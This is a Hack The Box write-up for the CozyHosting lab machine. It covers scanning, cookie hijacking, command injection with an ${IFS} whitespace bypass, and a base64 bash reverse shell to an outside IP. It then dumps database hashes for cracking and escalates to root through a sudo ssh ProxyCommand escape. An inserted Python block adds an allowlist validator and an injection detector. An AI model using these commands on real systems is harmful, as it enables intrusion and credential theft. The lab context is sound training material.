CozyHosting - Hack The Box
Reconnaissance
- Nmap
nmap -sS --open -p- --min-rate 5000 -vvv -n -Pn 10.10.11.230
- Add domain to /etc/hosts
echo "10.10.11.230 cozyhosting.htb" >> /etc/hosts
- Whatweb
whatweb http://cozyhosting.htb
- Dirsearch
dirsearch -u http://cozyhosting.htb
Exploitation
- Cookie Hijacking
- RCE
We can see the command output in the error message
tcpdump -i tun0 icmp
We can bypass the whitespace restriction with the IFS variable
- Send reverse shell
echo "bash -c 'bash -i >& /dev/tcp/10.10.16.2/9000 0>&1'" | base64
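The IFS bypass above only works because the host value is checked for literal whitespace before it reaches a shell. As an added example (not the application's own code, written in Python rather than the app's Java), this shows the assumed weak check beside an allowlist validator that closes the hole, plus a detector that flags IFS references and shell metacharacters in constructed log lines whose key=value format is an assumption.

```python
import ipaddress
import re

# Added example, not the box's application code. Assumption: the web app took a
# host value from a form, rejected only literal whitespace, and then handed the
# value to a shell command, which is what the ${IFS} bypass above relies on.

def weak_host_check(host):
    """Blacklist as assumed on the vulnerable side: only whitespace is refused,
    so ';' and '${IFS}' pass straight through to the shell."""
    return not any(c.isspace() for c in host)

_LABEL = r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
_HOSTNAME_RE = re.compile(rf"^{_LABEL}(?:\.{_LABEL})*\.?$")

def strict_host_check(host):
    """Allowlist fix: accept only a syntactically valid IP address or DNS name.
    Shell metacharacters and '$' can never satisfy either grammar."""
    if not host or len(host) > 253:
        return False
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return _HOSTNAME_RE.match(host) is not None

# Detection side: shell metacharacters or an IFS reference inside a host value.
_INJECTION_RE = re.compile(r"\$\{?IFS\}?|[;|&`]|\$\(")

def find_injection_attempts(log_lines):
    """Return (line_no, host_value) for each log line whose host= field looks
    like a command-injection attempt. The log format is an assumption."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = re.search(r"host=(\S+)", line)
        if m and _INJECTION_RE.search(m.group(1)):
            hits.append((n, m.group(1)))
    return hits

# Constructed sample lines in an assumed key=value format (not real box logs).
SAMPLE_LOG = [
    "2024-01-01T10:00:00Z user=alice host=cozyhosting.htb result=ok",
    "2024-01-01T10:00:05Z user=alice host=10.10.11.230;id result=error",
    "2024-01-01T10:00:09Z user=alice host=x;ping${IFS}10.10.16.2 result=error",
]

if __name__ == "__main__":
    print(find_injection_attempts(SAMPLE_LOG))
```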
Post-exploitation
- Inspect .jar file
python3 -m http.server 8000
curl -o cozy.jar http://10.10.11.230:8000/cloudhosting-0.0.1.jar
jd-gui
- Connect to PostgreSQL Database
psql -h localhost -U postgres -d cozyhosting
select * from users;
$2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6e
$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm
hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt
- Pivoting
su josh
- Sudoers
sudo -l
sudo ssh -o ProxyCommand=';bash 0<&2 1>&2' x